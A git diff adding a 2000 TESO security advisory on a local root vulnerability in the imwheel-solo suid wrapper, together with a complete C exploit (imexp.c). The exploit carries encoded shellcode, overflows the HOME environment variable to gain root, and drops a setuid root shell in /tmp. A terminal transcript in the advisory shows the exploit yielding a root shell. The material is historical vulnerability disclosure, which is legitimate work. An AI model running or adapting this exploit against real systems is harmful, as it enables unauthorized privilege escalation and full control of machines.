initial

2 files changed, 251 insertions, 0 deletions

diff --git a/advisories/teso-advisory-006/advisory-006.txt b/advisories/teso-advisory-006/advisory-006.txt
new file mode 100644
index 0000000..57dfae2
--- /dev/null
+++ b/advisories/teso-advisory-006/advisory-006.txt
@@ -0,0 +1,157 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+- ------
+
+TESO Security Advisory
+2000/03/13
+
+imwheel local root compromise
+
+
+Summary
+===================
+
+    A vulnerability within the imwheel application for Linux has been
+    discovered. Some of these packages are shipped with an suid-root
+    wrapper-script that invokes the insecure program 'imwheel' with UID 0.
+
+
+Systems Affected
+===================
+
+    Any system which has imwheel-solo wrapper-script installed as set-UID root.
+
+    Among the vulnerable distributions (if the package is installed) are the
+    following systems:
+
+      Halloween Linux Version 4 - imwheel package from the
+                                  powertools/contrib. CD
+
+
+Tests
+===================
+
+    [stealth@liane stealth]$ id
+    uid=500(stealth) gid=500(stealth) groups=500(stealth)
+    [stealth@liane stealth]$ cd imhack/
+    [stealth@liane imhack]$ stat `which imwheel-solo`
+      File: "/usr/X11R6/bin/imwheel-solo"
+      Size: 795          Filetype: Regular File
+      Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
+    Device:  3,1   Inode: 214472    Links: 1
+    Access: Mon Mar 13 17:32:22 2000(00000.00:04:38)
+    Modify: Mon Nov  1 23:41:15 1999(00132.17:55:45)
+    Change: Sun Mar 12 17:49:43 2000(00000.23:47:17)
+    [stealth@liane imhack]$ cc imexp.c
+    [stealth@liane imhack]$ ./a.out
+    Creating boom-shell...
+    Creating shellcode...
+    You can also add an offset to the commandline.
+    Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
+    Respect other users privacy!
+    Invoking vulnerable program (imwheel-solo)...
+    imwheel is not running as a daemon.
+    imwheel is not checking/writing a pid file, BE CAREFUL!
+    An imwheel may be running already, two or more imwheel processes
+    on the same X display, or using gpm -W, will not operate as expected!
+    imwheel started (pid=1385)
+    Knocking on heavens door...
+    sh-2.03# id
+    uid=0(root) gid=500(stealth) groups=500(stealth)
+    sh-2.03#
+
+
+Impact
+===================
+
+    An attacker may gain local root-access to a system where vulnerable imwheel
+    package is installed. Even if it should not be possible for him to get a
+    root-shell (f.e. due to a non-exec stack-patch) he can use the suid-root
+    perlscript to kill arbitrary processes.
+
+
+Explanation
+===================
+
+    The suid-root perlscript 'imwheel-solo' invokes the 'imwheel' program with
+    EUID 0.
+    Due to inaccurate bounds-checking an internal stack-located buffer can
+    be overflowed by an attacker. The 'imwheel' program doesn't bounds-check
+    the string it gets from the HOME environment variable.
+    Further the wrapper-script which runs privileged can be fooled into sending
+    a SIGTERM signal to arbitrary processes, causing them to die.
+    This problem appears because imwheel-solo blindly trusts any PID given by a
+    world-writable pid-file.
+
+
+Solution
+===================
+
+    The author and the distributor has been informed before.
+    A patch is not yet available. Just remove the suid wrapper-script.
+
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration programs are due to S. Krahmer [1].
+    The shell-code is due to Stealth.
+
+    This advisory has been written by S. Krahmer.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@coredump.cx.
+    Our web page is at https://teso.scene.at/
+    
+    C-Skills developers may be reached through [1].
+
+
+References
+===================
+
+    [1] S. Krahmer, C-Skills
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+    [2] TESO
+        http://teso.scene.at or https://teso.scene.at/
+        
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+
+    The exploit is available from
+
+       http://teso.scene.at/ or https://teso.scene.at/
+
+    and
+        
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+- ------
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.0 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE4zpugcZZ+BjKdwjcRAjFrAJ94U2wicQsueZ7SdbelfcxHatqyDACfUTT8
+bRCC41Ikx6h0NQZZx1JoT60=
+=/R6+
+-----END PGP SIGNATURE-----
diff --git a/advisories/teso-advisory-006/imexp.c b/advisories/teso-advisory-006/imexp.c
new file mode 100644
index 0000000..28fc69b
--- /dev/null
+++ b/advisories/teso-advisory-006/imexp.c
@@ -0,0 +1,94 @@
+/*** Halloween 4 local root exploit for imwheel-solo. Other distros are
+ *** maybe affected as well.
+ *** (C) 2000 by C-skills development. Under the GPL. 
+ *** 
+ *** Bugdiscovery + exploit by S. Krahmer & Stealth.
+ ***
+ *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
+ ***
+ *** other advisories and kewl stuff at:
+ *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
+ ***
+ ***/
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <errno.h>
+
+
+
+/* chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755);
+ */
+char shell[] =
+"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x01\x46\xe2\xfa"
+"\xea\x0d\x2e\x75\x6c\x71\x2e\x63\x6e\x6e\x6c\x72\x69\x01\x80\xed"
+"\x66\x2a\x01\x01\x54\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xab\x11"
+"\x01\x01\x30\xc8\x8c\xb2\x3b\xee\xfe\xfe\xb9\xb7\x01\x01\x01\x88\xcb\x52\x88"
+"\xf2\xcc\x81\xb8\xec\x08\x01\x01\xb9\x0e\x01\x01\x01\x52\x88\xf2\xcc\x81\x30"
+"\xc1\x5a\x5f\x88\xed\x5c\xc2\x91\x91\x91\x91\x91\x91\x91\x91";
+
+
+/* filename-buffer plus ret + ebp
+ */
+#define buflen (2048+8)
+
+int main(int argc, char **argv)
+{                                                               
+        char *im[] = {
+                "/usr/X11R6/bin/imwheel-solo", 
+                0
+        };
+        char *a[] = {
+                "/tmp/boomsh",
+                0
+        };
+        FILE *f;
+        struct stat s;  
+        char boom[buflen+10];
+        int i = 0, j = 0, ret =  0xbfffee68;    /* this address works for me */
+
+        if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) {
+                perror("fopen");
+                exit(errno);
+        }
+        printf("Creating boom-shell...\n");
+        fprintf(f, "int main() {char *a[]={\"/bin/sh\",0};\nsetuid(0);\nexecve(*a, a, 0);\nreturn 0;}\n");
+        fclose(f);
+        system("cc /tmp/boomsh.c -o /tmp/boomsh");
+
+        printf("Creating shellcode...\n");
+        memset(boom, 0, sizeof(boom));
+        memset(boom, 0x90, buflen);
+        if (argc > 1)
+                ret += atoi(argv[1]);
+        else
+                printf("You can also add an offset to the commandline.\n");
+        for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
+                boom[i] = shell[j++];
+        *(long*)(&boom[i]) = ret; 
+        
+        printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
+               "Respect other users privacy!\n");
+        
+        setenv("HOME", boom, 1);
+        setenv("DISPLAY", ":0", 1);
+        
+        printf("Invoking vulnerable program (imwheel-solo)...\n");
+        if (fork() == 0) {
+                execl(im[0], im[0], im[1], im[2], 0);
+        }
+        sleep(4);
+        
+        memset(&s, 0, sizeof(s));
+        stat("/tmp/boomsh", &s);
+        if ((S_ISUID & s.st_mode) != S_ISUID) {
+                printf("Boom-shell not SUD-root! Wrong offset or patched version of imwheel.\n");
+                return -1;
+        }
+        /* Huh? :-)
+         */
+        printf("Knocking on heavens door...\n");
+        execve(a[0], a, 0);
+        return 0;
+}